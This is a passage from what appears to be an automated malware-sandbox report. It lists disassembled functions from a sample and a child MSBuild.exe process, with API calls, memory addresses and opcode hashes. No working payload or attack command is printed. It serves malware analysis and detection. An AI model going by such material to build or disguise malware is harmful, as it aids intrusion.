Associated: 00000000.00000002.2181712976.00007FF67DF28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181712976.00007FF67DF2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181712976.00007FF67DF35000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181873382.00007FF67DF37000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff67dcb0000_SecuriteInfo.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: 82ef3b1ae6863399bee2c66c65ea360d63d7699ced2380568c227ba709139a42
Instruction ID: 30e933b8a7f1ecebb9482ff4a2f0c69162cd25d97bd6be45e496f444a73c82ce
Opcode Fuzzy Hash: 82ef3b1ae6863399bee2c66c65ea360d63d7699ced2380568c227ba709139a42
Instruction Fuzzy Hash: 09E1AE63B2AA9685DA148F64E9506B873A5FF047E4F914B32D93D97BD8EF2CD016C300

Function 00007FF67DCB3700 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 126COMMON

Download Yara Rule

APIs

RaiseFailFastException.KERNEL32 ref: 00007FF67DCB37A0
RaiseFailFastException.KERNEL32 ref: 00007FF67DCB38A9
RaiseFailFastException.KERNEL32 ref: 00007FF67DCB38E6

Strings

Process is terminating due to StackOverflowException., xrefs: 00007FF67DCB378A

Memory Dump Source

Source File: 00000000.00000002.2179824254.00007FF67DCB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67DCB0000, based on PE: true

Associated: 00000000.00000002.2179798235.00007FF67DCB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2180073970.00007FF67DDF1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2180689682.00007FF67DE57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181712976.00007FF67DF28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181712976.00007FF67DF2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181712976.00007FF67DF35000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181873382.00007FF67DF37000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff67dcb0000_SecuriteInfo.jbxd

Similarity

API ID: ExceptionFailFastRaise
String ID: Process is terminating due to StackOverflowException.
API String ID: 2546344036-2200901744
Opcode ID: 22eae19d51626ff98ec7988839692c0e8d7f4141dc708fb73d8230e261e0c955
Instruction ID: 10a72768534bf99d75bd17bda5156f6378ebfa8e7e97cd68534d937021c09888
Opcode Fuzzy Hash: 22eae19d51626ff98ec7988839692c0e8d7f4141dc708fb73d8230e261e0c955
Instruction Fuzzy Hash: 93518163F28A92D1EF508B16E55027823B4EF48B84F444B32DA1ED7BD1EF2DE4568740

Function 00007FF67DCF3030 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 73libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,?,?,?,0000019C19400000,00007FF67DCF312D,?,?,00000000,00007FF67DCDFB1C,?,FFFFFFFF,47AE147AE147AE15,00007FF67DCC96CC), ref: 00007FF67DCF3082
GetProcAddress.KERNEL32(?,?,?,?,0000019C19400000,00007FF67DCF312D,?,?,00000000,00007FF67DCDFB1C,?,FFFFFFFF,47AE147AE147AE15,00007FF67DCC96CC), ref: 00007FF67DCF309C

Strings

kernel32.dll, xrefs: 00007FF67DCF306D
GetEnabledXStateFeatures, xrefs: 00007FF67DCF3092

Memory Dump Source

Source File: 00000000.00000002.2179824254.00007FF67DCB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67DCB0000, based on PE: true

Associated: 00000000.00000002.2179798235.00007FF67DCB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2180073970.00007FF67DDF1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2180689682.00007FF67DE57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181712976.00007FF67DF28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181712976.00007FF67DF2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181712976.00007FF67DF35000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181873382.00007FF67DF37000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff67dcb0000_SecuriteInfo.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetEnabledXStateFeatures$kernel32.dll
API String ID: 2574300362-4754247
Opcode ID: ced567418731d23f9377d669990a1db323048f10ce97e0985dd48ca2feda27c8
Instruction ID: dd09dadedcc4fc17cc26b1d0d672406622f26722cae4c263eb570c80a5e540ba
Opcode Fuzzy Hash: ced567418731d23f9377d669990a1db323048f10ce97e0985dd48ca2feda27c8
Instruction Fuzzy Hash: 5721DF53F3D15252FFB98225E4523F912A9DB14394F848A3AD94EC26C8FD3DE9828A00

Function 00007FF67DCBB250 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 20libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,?,?,?,00007FF67DCB5596), ref: 00007FF67DCBB263
GetProcAddress.KERNEL32(?,?,?,?,00007FF67DCB5596), ref: 00007FF67DCBB278

Strings

kernel32, xrefs: 00007FF67DCBB256
GetEnabledXStateFeatures, xrefs: 00007FF67DCBB26E

Memory Dump Source

Source File: 00000000.00000002.2179824254.00007FF67DCB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67DCB0000, based on PE: true

Associated: 00000000.00000002.2179798235.00007FF67DCB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2180073970.00007FF67DDF1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2180689682.00007FF67DE57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181712976.00007FF67DF28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181712976.00007FF67DF2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181712976.00007FF67DF35000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181873382.00007FF67DF37000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff67dcb0000_SecuriteInfo.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetEnabledXStateFeatures$kernel32
API String ID: 2574300362-4273408117
Opcode ID: 961ca09cc273ed846eb79f745425e20624b81655657b3af4e2e057f3e8045729
Instruction ID: 50d64b690a7f3ab90e190c9dd69e858c5d8740417240c7104ffb364692d2b172
Opcode Fuzzy Hash: 961ca09cc273ed846eb79f745425e20624b81655657b3af4e2e057f3e8045729
Instruction Fuzzy Hash: 0CE04F56F2660281FE976B51AC452741361BFA9781FC84D75C85E823C0FD3CA29A8B21

Function 00007FF67DCBB200 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 20libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,?,?,?,00007FF67DCB561B), ref: 00007FF67DCBB213
GetProcAddress.KERNEL32(?,?,?,?,00007FF67DCB561B), ref: 00007FF67DCBB228

Strings

kernel32, xrefs: 00007FF67DCBB206
GetEnabledXStateFeatures, xrefs: 00007FF67DCBB21E

Memory Dump Source

Source File: 00000000.00000002.2179824254.00007FF67DCB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67DCB0000, based on PE: true

Associated: 00000000.00000002.2179798235.00007FF67DCB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2180073970.00007FF67DDF1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2180689682.00007FF67DE57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181712976.00007FF67DF28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181712976.00007FF67DF2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181712976.00007FF67DF35000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181873382.00007FF67DF37000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff67dcb0000_SecuriteInfo.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetEnabledXStateFeatures$kernel32
API String ID: 2574300362-4273408117
Opcode ID: 869582206f43eca24559094eab6fe15c23c738a8a7efbf45dea2c1b540028bbd
Instruction ID: c4b684fc0b4bc50407032662fdc0dac616cc26998189edc9568fbbe1663a4f8b
Opcode Fuzzy Hash: 869582206f43eca24559094eab6fe15c23c738a8a7efbf45dea2c1b540028bbd
Instruction Fuzzy Hash: A6E0860AF2674281FE5BBB116C4127513617F45780FC84974C85E82380FE3CE65A8B21

Function 00007FF67DCEE970 Relevance: 6.1, APIs: 4, Instructions: 124threadCOMMON

Download Yara Rule

APIs

SwitchToThread.KERNEL32 ref: 00007FF67DCEE9EB
SwitchToThread.KERNEL32 ref: 00007FF67DCEEA89
SwitchToThread.KERNEL32 ref: 00007FF67DCEEA9E

Memory Dump Source

Source File: 00000000.00000002.2179824254.00007FF67DCB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67DCB0000, based on PE: true

Associated: 00000000.00000002.2179798235.00007FF67DCB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2180073970.00007FF67DDF1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2180689682.00007FF67DE57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181712976.00007FF67DF28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181712976.00007FF67DF2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181712976.00007FF67DF35000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181873382.00007FF67DF37000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff67dcb0000_SecuriteInfo.jbxd

Similarity

API ID: SwitchThread
String ID:
API String ID: 115865932-0
Opcode ID: f81b44ca407e1e5d81ab00286879b2029b408ee6f06e20b8608e09e3068c38cd
Instruction ID: f6f5bdce7d978c7403363f1eb7d83d14d77924a5e7a3cf5476e174bc7dda2b78
Opcode Fuzzy Hash: f81b44ca407e1e5d81ab00286879b2029b408ee6f06e20b8608e09e3068c38cd
Instruction Fuzzy Hash: 97419AB3A3855685EB648A26C04217D67ECFB44FD4F248B3AD61EC67C9ED2CE4438740

Function 00007FF67DCD1C6D Relevance: 6.1, APIs: 4, Instructions: 119threadCOMMON

Download Yara Rule

APIs

SwitchToThread.KERNEL32 ref: 00007FF67DCD1D92
SwitchToThread.KERNEL32 ref: 00007FF67DCD201E

Memory Dump Source

Source File: 00000000.00000002.2179824254.00007FF67DCB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67DCB0000, based on PE: true

Associated: 00000000.00000002.2179798235.00007FF67DCB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2180073970.00007FF67DDF1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2180689682.00007FF67DE57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181712976.00007FF67DF28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181712976.00007FF67DF2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181712976.00007FF67DF35000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181873382.00007FF67DF37000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff67dcb0000_SecuriteInfo.jbxd

Similarity

API ID: SwitchThread
String ID:
API String ID: 115865932-0
Opcode ID: 2577ca00420cad04640812f17fa9d31e80a39f04fb8df81fc5ef277dc4df519d
Instruction ID: 6d2c90368f0237041e7dad2f528bec419d3ce3a7ba7ea870ba2ebb240440b47d
Opcode Fuzzy Hash: 2577ca00420cad04640812f17fa9d31e80a39f04fb8df81fc5ef277dc4df519d
Instruction Fuzzy Hash: BC51F832E7829386F6549B359D4167962E9AF40754F254B39E80EC32D1FF2CF8428621

Function 00007FF67DCEF0E0 Relevance: 6.1, APIs: 4, Instructions: 108COMMON

Download Yara Rule

APIs

DebugBreak.KERNEL32 ref: 00007FF67DCEF1B9
DebugBreak.KERNEL32 ref: 00007FF67DCEF1D6
DebugBreak.KERNEL32 ref: 00007FF67DCEF1F1
DebugBreak.KERNEL32 ref: 00007FF67DCEF20A

Memory Dump Source

Source File: 00000000.00000002.2179824254.00007FF67DCB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67DCB0000, based on PE: true

Associated: 00000000.00000002.2179798235.00007FF67DCB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2180073970.00007FF67DDF1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2180689682.00007FF67DE57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181712976.00007FF67DF28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181712976.00007FF67DF2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181712976.00007FF67DF35000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181873382.00007FF67DF37000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff67dcb0000_SecuriteInfo.jbxd

Similarity

API ID: BreakDebug
String ID:
API String ID: 456121617-0
Opcode ID: 74c74103319f1d7b3111ee84ca78b4819d2ebd5451d4548c85482c5d5ca3b3b0
Instruction ID: 4a46374ccb88da6b6150bec62bd237f2042334bb1eb20e38173c4a47ce647754
Opcode Fuzzy Hash: 74c74103319f1d7b3111ee84ca78b4819d2ebd5451d4548c85482c5d5ca3b3b0
Instruction Fuzzy Hash: DA41C363A2D78981EA619B11E0023796BFCAF45B98F891A34DE0CC7395EF7CE4438300

Function 00007FF67DCDD280 Relevance: 6.1, APIs: 4, Instructions: 85COMMON

Download Yara Rule

APIs

DebugBreak.KERNEL32(?,?,?,?), ref: 00007FF67DCDD339
DebugBreak.KERNEL32(?,?,?,?), ref: 00007FF67DCDD356
DebugBreak.KERNEL32(?,?,?,?), ref: 00007FF67DCDD376
DebugBreak.KERNEL32(?,?,?,?), ref: 00007FF67DCDD399

Memory Dump Source

Source File: 00000000.00000002.2179824254.00007FF67DCB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67DCB0000, based on PE: true

Associated: 00000000.00000002.2179798235.00007FF67DCB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2180073970.00007FF67DDF1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2180689682.00007FF67DE57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181712976.00007FF67DF28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181712976.00007FF67DF2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181712976.00007FF67DF35000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181873382.00007FF67DF37000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff67dcb0000_SecuriteInfo.jbxd

Similarity

API ID: BreakDebug
String ID:
API String ID: 456121617-0
Opcode ID: f4503846e52881753d47da5e2b1402b1181e9a572cdd2fa657359faf4ca4e1cb
Instruction ID: c5e2136f3f0132e373beb0671bbbd286dde472068c88b3b08a330f9358f36d87
Opcode Fuzzy Hash: f4503846e52881753d47da5e2b1402b1181e9a572cdd2fa657359faf4ca4e1cb
Instruction Fuzzy Hash: 7E319523E5C74282EA655F55A4412B9A7F8FF44B94F2C0A35DA4D87799EF3CD8428310

Function 00007FF67DCBAD80 Relevance: 6.0, APIs: 4, Instructions: 46COMMON

Download Yara Rule

APIs

WaitForMultipleObjectsEx.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF67DCB64B1), ref: 00007FF67DCBADB4
SetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF67DCB64B1), ref: 00007FF67DCBADBE
CoWaitForMultipleHandles.OLE32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF67DCB64B1), ref: 00007FF67DCBADDD
SetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF67DCB64B1), ref: 00007FF67DCBADF1

Memory Dump Source

Source File: 00000000.00000002.2179824254.00007FF67DCB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67DCB0000, based on PE: true

Associated: 00000000.00000002.2179798235.00007FF67DCB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2180073970.00007FF67DDF1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2180689682.00007FF67DE57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181712976.00007FF67DF28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181712976.00007FF67DF2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181712976.00007FF67DF35000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181873382.00007FF67DF37000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff67dcb0000_SecuriteInfo.jbxd

Similarity

API ID: ErrorLastMultipleWait$HandlesObjects
String ID:
API String ID: 2817213684-0
Opcode ID: 575de51f3a294162dbf1c67d8ac1e5a7a5c8a811859f7b76b171d201c058d2a6
Instruction ID: a423ff3e0060f260f81b413a1fd5ec1253126d8b440626a8250d35102c9882af
Opcode Fuzzy Hash: 575de51f3a294162dbf1c67d8ac1e5a7a5c8a811859f7b76b171d201c058d2a6
Instruction Fuzzy Hash: FC11863261C695C2D7244B26B90112AB275FB44790F540A39EACEC3BE4EF7CD4518B40

Function 00007FF67DD1A960 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF67DD19AEB), ref: 00007FF67DD1A9B0
RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF67DD19AEB), ref: 00007FF67DD1A9F1

Strings

csm, xrefs: 00007FF67DD1A9DE

Memory Dump Source

Source File: 00000000.00000002.2179824254.00007FF67DCB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67DCB0000, based on PE: true

Associated: 00000000.00000002.2179798235.00007FF67DCB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2180073970.00007FF67DDF1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2180689682.00007FF67DE57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181712976.00007FF67DF28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181712976.00007FF67DF2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181712976.00007FF67DF35000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181873382.00007FF67DF37000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff67dcb0000_SecuriteInfo.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: fe138634e94c212e63ee4562904113ca92d362cfbe7d1a7eb52c3d5f96bd5a35
Instruction ID: e8050cd6e112c753c3564625e977469454fdc31a29cd857d3d4b393fa3cc250d
Opcode Fuzzy Hash: fe138634e94c212e63ee4562904113ca92d362cfbe7d1a7eb52c3d5f96bd5a35
Instruction Fuzzy Hash: 2D111C32628B8182EB218B25F94026977E5FB88B84F5A5730DECD47B58EF3DD5918700

Function 00007FF67DCE16E0 Relevance: 5.1, APIs: 4, Instructions: 112COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,?,?,00000000,00007FF67DCCD596,?,-8000000000000000,00000001,00007FF67DCDC756), ref: 00007FF67DCE176A
LeaveCriticalSection.KERNEL32(?,?,?,?,00000000,00007FF67DCCD596,?,-8000000000000000,00000001,00007FF67DCDC756), ref: 00007FF67DCE17D9
EnterCriticalSection.KERNEL32(?,?,?,?,00000000,00007FF67DCCD596,?,-8000000000000000,00000001,00007FF67DCDC756), ref: 00007FF67DCE1822
LeaveCriticalSection.KERNEL32(?,?,?,?,00000000,00007FF67DCCD596,?,-8000000000000000,00000001,00007FF67DCDC756), ref: 00007FF67DCE1838

Memory Dump Source

Source File: 00000000.00000002.2179824254.00007FF67DCB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67DCB0000, based on PE: true

Associated: 00000000.00000002.2179798235.00007FF67DCB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2180073970.00007FF67DDF1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2180689682.00007FF67DE57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181712976.00007FF67DF28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181712976.00007FF67DF2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181712976.00007FF67DF35000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181873382.00007FF67DF37000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff67dcb0000_SecuriteInfo.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: 22853f26e13af6e76a51d98bdc700caa82f9067d7e59c60d265fa02c72d7c76d
Instruction ID: ff75affe2b9ea5c4a6e1d6d09f59cfbab2c1953f9576c255f82262832d2d4d65
Opcode Fuzzy Hash: 22853f26e13af6e76a51d98bdc700caa82f9067d7e59c60d265fa02c72d7c76d
Instruction Fuzzy Hash: C5517173A28A9281E6208F25FC413746368FF55B84F450B32DA5DC3695EF3CE566C310

Function 00007FF67DCD3E90 Relevance: 5.1, APIs: 4, Instructions: 53COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,00000000,00007FF67DCD400F,?,?,?,00007FF67DCE02DA), ref: 00007FF67DCD3EDA
LeaveCriticalSection.KERNEL32(?,?,00000000,00007FF67DCD400F,?,?,?,00007FF67DCE02DA), ref: 00007FF67DCD3F1C
EnterCriticalSection.KERNEL32(?,?,00000000,00007FF67DCD400F,?,?,?,00007FF67DCE02DA), ref: 00007FF67DCD3F47
LeaveCriticalSection.KERNEL32(?,?,00000000,00007FF67DCD400F,?,?,?,00007FF67DCE02DA), ref: 00007FF67DCD3F68

Memory Dump Source

Source File: 00000000.00000002.2179824254.00007FF67DCB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67DCB0000, based on PE: true

Associated: 00000000.00000002.2179798235.00007FF67DCB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2180073970.00007FF67DDF1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2180689682.00007FF67DE57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181712976.00007FF67DF28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181712976.00007FF67DF2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181712976.00007FF67DF35000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181873382.00007FF67DF37000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff67dcb0000_SecuriteInfo.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: 7b5c5380cd48388d178edce08a48c3bc068cb183a837e845f076f16a9dd0c5c9
Instruction ID: a1ae6e6aa65cc87703f2e1f024862b95c4d4d51aaf3ed16c8e3b1bb0509cf2db
Opcode Fuzzy Hash: 7b5c5380cd48388d178edce08a48c3bc068cb183a837e845f076f16a9dd0c5c9
Instruction Fuzzy Hash: 7C213B23A3998681EA509B38FC403B82364EF443A0F990B32D52CC26E5FF6CE496C301

Analysis Process: MSBuild.exePID: 1340, Parent PID: 3224COMMON

Executed Functions

Function 015325F9 Relevance: .5, Instructions: 493COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.4623098566.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1530000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bbae59ee52dbb673bdfa29889f32180ce8657ac2f6fbd5041108282215fa6f65
Instruction ID: 979dfbbad6efc34fe3d4d5a813b8d44e6119fc6652ce8dd0464392e8e1827832
Opcode Fuzzy Hash: bbae59ee52dbb673bdfa29889f32180ce8657ac2f6fbd5041108282215fa6f65
Instruction Fuzzy Hash: BCF0F6317052856FD746A778ACA09777BBBEFCB610B0904BAE449CB356C9254C0AC7A4

Function 01531648 Relevance: .1, Instructions: 114COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.4623098566.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1530000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f1f0bbf3180b8ed5b0c0cf097d12ecad9b8ab06f4920d03afd1f5d691f466bad
Instruction ID: c52f3925282cc1b6c61e60f0786c78aa9ade4e9f70a49a1e253af060b522e2f2
Opcode Fuzzy Hash: f1f0bbf3180b8ed5b0c0cf097d12ecad9b8ab06f4920d03afd1f5d691f466bad
Instruction Fuzzy Hash: 4D416B34A0020A8FDB15EB78D5947AEBBF2BFC8310F188569D416AB395DB31DC42CB90

Function 01531658 Relevance: .1, Instructions: 112COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.4623098566.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1530000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 79d7f46a307cbf016eed94528ab3e5b5927ea8d56f8a78316fa2cc57909b907c
Instruction ID: e21187725c326fa0189e11c0fa43c375591e7ae7823ef31013f907a358fa9150
Opcode Fuzzy Hash: 79d7f46a307cbf016eed94528ab3e5b5927ea8d56f8a78316fa2cc57909b907c
Instruction Fuzzy Hash: 06416B34A002098FDB15EB78D5946AEBBF2BBC8310F288569D415AB395DB31EC41CB91

Function 01530808 Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.4623098566.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1530000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7f8a2be95d99c8d0c8694f23038d841e0faba61aa2b3dda098987de07f015e36
Instruction ID: fbfe45a1a0b8117a5a4a0e90ecfcceb2f127209a826408934eaf6a2ae4ca811c
Opcode Fuzzy Hash: 7f8a2be95d99c8d0c8694f23038d841e0faba61aa2b3dda098987de07f015e36
Instruction Fuzzy Hash: A8212026A093A58FDB479B7888647EE7F71BFC2614F19019ED080EF2E3C6248905C7D1

Function 0124D4D8 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.4622817312.000000000124D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0124D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_124d000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9743c81aae34cb20f1237373f34322a8cc70990ae2f808d37681dc20b7a7b4d5
Instruction ID: 1c82d9b90d17017b83a0896fff1dee576539ab1bcc9d35e1e8f4dd4dbe3f462e
Opcode Fuzzy Hash: 9743c81aae34cb20f1237373f34322a8cc70990ae2f808d37681dc20b7a7b4d5
Instruction Fuzzy Hash: 42216771510208DFDB09DF88E9C0F16BF65FB98318F2481ACEA0A0B256C776D456CBE2

Function 015308DD Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.4623098566.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false

Joe Sandbox IDA Plugin

